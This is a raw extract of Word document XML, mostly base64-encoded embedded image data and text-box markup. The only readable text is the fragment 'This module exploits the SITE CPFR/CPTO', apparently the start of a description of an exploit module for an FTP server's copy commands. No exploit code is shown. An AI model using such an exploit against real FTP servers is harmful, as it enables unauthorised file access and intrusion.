f/aKAPpeivmf/hsH&#10;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Mg+FNovBAAAIhkAAA4AAAAAAAAAAAAA&#10;AAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhADcdCoiRAQEAkQEBABQAAAAAAAAA&#10;AAAAAAAAmAYAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAMTrZqndAAAABgEA&#10;AA8AAAAAAAAAAAAAAAAAWwgBAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAA&#10;ACEBAAAZAAAAAAAAAAAAAAAAAGUJAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAG&#10;AAYAfAEAAFYKAQAAAA==&#10;">
                      <v:shape id="Picture 340768" o:spid="_x0000_s1049" type="#_x0000_t75" style="position:absolute;top:1905;width:112299;height:24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RibxAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9da8Iw&#10;FH0X9h/CHexNUzetozPKEAUVGczq+6W5tsXmJjRRu/168yD4eDjf03lnGnGl1teWFQwHCQjiwuqa&#10;SwWHfNX/BOEDssbGMin4Iw/z2Utvipm2N/6l6z6UIoawz1BBFYLLpPRFRQb9wDriyJ1sazBE2JZS&#10;t3iL4aaR70mSSoM1x4YKHS0qKs77i1HgXO7yHW0P7ue40RNTHpf/46FSb6/d9xeIQF14ih/utVbw&#10;MUomaRwc/8QvIGd3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADk5GJvEAAAA3wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                        <v:imagedata r:id="rId83" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 123596" o:spid="_x0000_s1050" style="position:absolute;left:13525;width:7073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8aUxQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0X+g/DLbirkyoVE50EaS26rA9Qd5fMNQnN3AmZ0US/vlMouDyc9zzrTS2u1LrKsoK3YQSCOLe6&#10;4kLBfvf1OgXhPLLG2jIpuJGDLH1+mmOibccbum59IUIIuwQVlN43iZQuL8mgG9qGOHBn2xr0AbaF&#10;1C12IdzUchRFE2mw4tBQYkMfJeU/24tRsJo2i+Pa3ruiXp5Wh+9D/LmLvVKDl34xA+Gp9w/xv3ut&#10;w/zR+D2ewN+fAECmvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAIO8aUxQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5F30DD88" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">This </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123597" o:spid="_x0000_s1051" style="position:absolute;left:19145;top:190;width:10113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2MPxQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTTS1Vk7qKtJbkaFVQb0N2moRmZ0N2NdFf3y0IPT7e93zZm1pcqHWVZQXPowgEcW51&#10;xYWC/e5zOAPhPLLG2jIpuJKD5eJhMMdE246/6LL1hQgh7BJUUHrfJFK6vCSDbmQb4sB929agD7At&#10;pG6xC+GmluMomkiDFYeGEht6Lyn/2Z6NgnTWrI6ZvXVFvT6lh80h/tjFXqmnx371BsJT7//Fd3em&#10;w/zxy2s8hb8/AYBc/AIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBnd2MPxQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1979AAAA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="34"/>
                                </w:rPr>
                                <w:t xml:space="preserve">module </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123598" o:spid="_x0000_s1052" style="position:absolute;left:26860;width:13027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Pd9xQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFHrTTZUWE11F1KLH+gDb25Adk9DsbMhuTdpf3zkUPH587/myd7W6URsqzwaeRwko4tzb&#10;igsD59PbcAoqRGSLtWcy8EMBlouHwRwz6zs+0O0YCyUhHDI0UMbYZFqHvCSHYeQbYuGuvnUYBbaF&#10;ti12Eu5qPU6SV+2wYmkosaF1SfnX8dsZ2E2b1cfe/3ZFvf3cXd4v6eaURmOeHvvVDFSkPt7F/+69&#10;lfnjyUsqg+WPANCLPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAW6Pd9xQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="4C4B9B3A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="46"/>
                                </w:rPr>
                                <w:t xml:space="preserve">exploits </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123599" o:spid="_x0000_s1053" style="position:absolute;left:36766;width:5933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FLmxAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0L/sNwC+50UsVioqOIbdGlL1B3l8w1CWbuhMzUxH59Ryi4PJz3bNGaUtypdoVlBe+DCARxanXB&#10;mYLj4bs/AeE8ssbSMil4kIPFvNuZYaJtwzu6730mQgi7BBXk3leJlC7NyaAb2Io4cFdbG/QB1pnU&#10;NTYh3JRyGEUf0mDBoSHHilY5pbf9j1GwnlTL88b+Nln5dVmftqf48xB7pXpv7XIKwlPrX+J/90aH&#10;+cPROI7h+ScAkPM/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHmkUubEAAAA3wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="022812DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">the </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123600" o:spid="_x0000_s1054" style="position:absolute;left:41338;width:7073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Q+AxAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50owXR1FVELXqsWrC9DdlpEpqdDdmtif76zkHw+Hjfi1XnKnWlJpSeDYxHCSjizNuS&#10;cwOf5/fhDFSIyBYrz2TgRgFWy35vgan1LR/peoq5khAOKRooYqxTrUNWkMMw8jWxcD++cRgFNrm2&#10;DbYS7io9SZKpdliyNBRY06ag7Pf05wzsZ/X66+DvbV7tvveXj8t8e55HY14G3foNVKQuPsUP98HK&#10;/MnrNJEH8kcA6OU/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANuxD4DEAAAA3wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="09ACC2B9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">SITE </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123601" o:spid="_x0000_s1055" style="position:absolute;left:46863;top:190;width:14800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aobwwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CLHhbUxVEq1FEXfSoVnD3NjRjW7aZlCZrq7/eCILHx/ueLVpTiivVrrCsoN+LQBCnVhec&#10;KTgl319jEM4jaywtk4IbOVjMOx8zjLVt+EDXo89ECGEXo4Lc+yqW0qU5GXQ9WxEH7mJrgz7AOpO6&#10;xiaEm1IOomgkDRYcGnKsaJVT+nf8Nwq242r5s7P3Jis3v9vz/jxZJxOvVPezXU5BeGr9W/xy73SY&#10;PxiOoj48/wQAcv4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAtP2qG8MAAADfAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5CA82321" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">CPFR/CPTO </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
